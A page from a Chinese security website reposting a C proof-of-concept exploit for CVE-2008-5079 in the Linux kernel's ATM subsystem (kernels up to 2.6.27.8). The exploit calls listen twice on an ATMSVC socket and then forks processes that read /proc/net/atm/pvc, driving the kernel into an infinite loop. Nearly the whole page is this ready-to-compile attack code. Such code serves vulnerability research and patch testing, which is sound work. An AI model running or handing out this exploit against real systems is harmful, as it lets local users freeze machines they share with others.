首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel <= 2.6.27.8 ATMSVC Local Denial of Service Exploit
来源:jon@oberheide.org 作者:Jon 发布时间:2008-12-11  
/*
 * cve-2008-5079.c
 *
 * Linux Kernel <= 2.6.27.8 ATMSVC local DoS
 * Jon Oberheide <jon@oberheide.org>
 *
 * http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5079:
 *
 *   net/atm/svc.c in the ATM subsystem in the Linux kernel 2.6.27.8
 *   and earlier allows local users to cause a denial of service 
 *   (kernel infinite loop) by making two calls to svc_listen for the
 *   same socket, and then reading a /proc/net/atm/*vc file, related 
 *   to corruption of the vcc table. 
 *
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
#include <linux/atm.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
 
#define NR_CPUS 8
#define PROC_ATM "/proc/net/atm/pvc"
 
int
main(void)
{
    char *err, dummy[1024];
    int i, ret, sock, proc;
    struct atm_qos qos;
    struct sockaddr_atmsvc addr;
 
    printf("[+] creating ATM socket...\n");
 
    sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);
    if (sock < 0) {
        err = "socket(2) for type PF_ATMSVC failed";
        printf("[-] PoC error: %s (%s)\n", err, strerror(errno));
        return 1;
    }
 
    memset(&qos, 0, sizeof(qos));
    qos.rxtp.traffic_class = ATM_UBR;
    qos.txtp.traffic_class = ATM_UBR;
    qos.aal = ATM_NO_AAL;
 
    printf("[+] setting socket QoS options...\n");
 
    ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &qos, sizeof(qos));
    if (ret == -1) {
        err = "setsockopt(2) for option SO_ATMQOS failed";
        printf("[-] PoC error: %s (%s)\n", err, strerror(errno));
        return 1;
    }
 
    memset(&addr, 0, sizeof(addr));
    addr.sas_family = AF_ATMSVC;
 
    printf("[+] binding socket...\n");
 
    bind(sock, (struct sockaddr *) &addr, sizeof(addr));
 
    printf("[+] socket listen...\n");
 
    listen(sock, 10);
 
    printf("[+] duplicate socket listen...\n");
 
    listen(sock, 10);
 
    printf("[+] attempting local DoS...\n");
 
    for (i = 0; i < NR_CPUS; ++i) {
        if (fork() != 0) {
            break;
        }
    }
 
    proc = open(PROC_ATM, O_RDONLY);
    if (proc == -1) {
        err = "opening " PROC_ATM " failed";
        printf("[-] PoC error: %s (%s)\n", err, strerror(errno));
        return 1;
    }
    ret = read(proc, &dummy, 1024);
    close(proc);
   
    printf("[-] Local DoS failed.\n");
 
    return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MS Internet Explorer XML Parsi
·eZ Publish < 3.9.5/3.10.1/4.0.
·MS Internet Explorer XML Parsi
·EasyMail ActiveX (emmailstore.
·Internet Explorer 7.0 XML 0da
·Vinagre < 2.24.2 show_error()
·Exploits Multiple XSRF in DD-W
·linux x86 shellcode obfuscator
·eZ Publish 3.9.0/3.9.5/3.10.1
·Internet Explorer 8.0 Beta 2 A
·DD-WRT v24-sp1 (XSRF) Cross Si
·MS Visual Basic ActiveX Contro
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved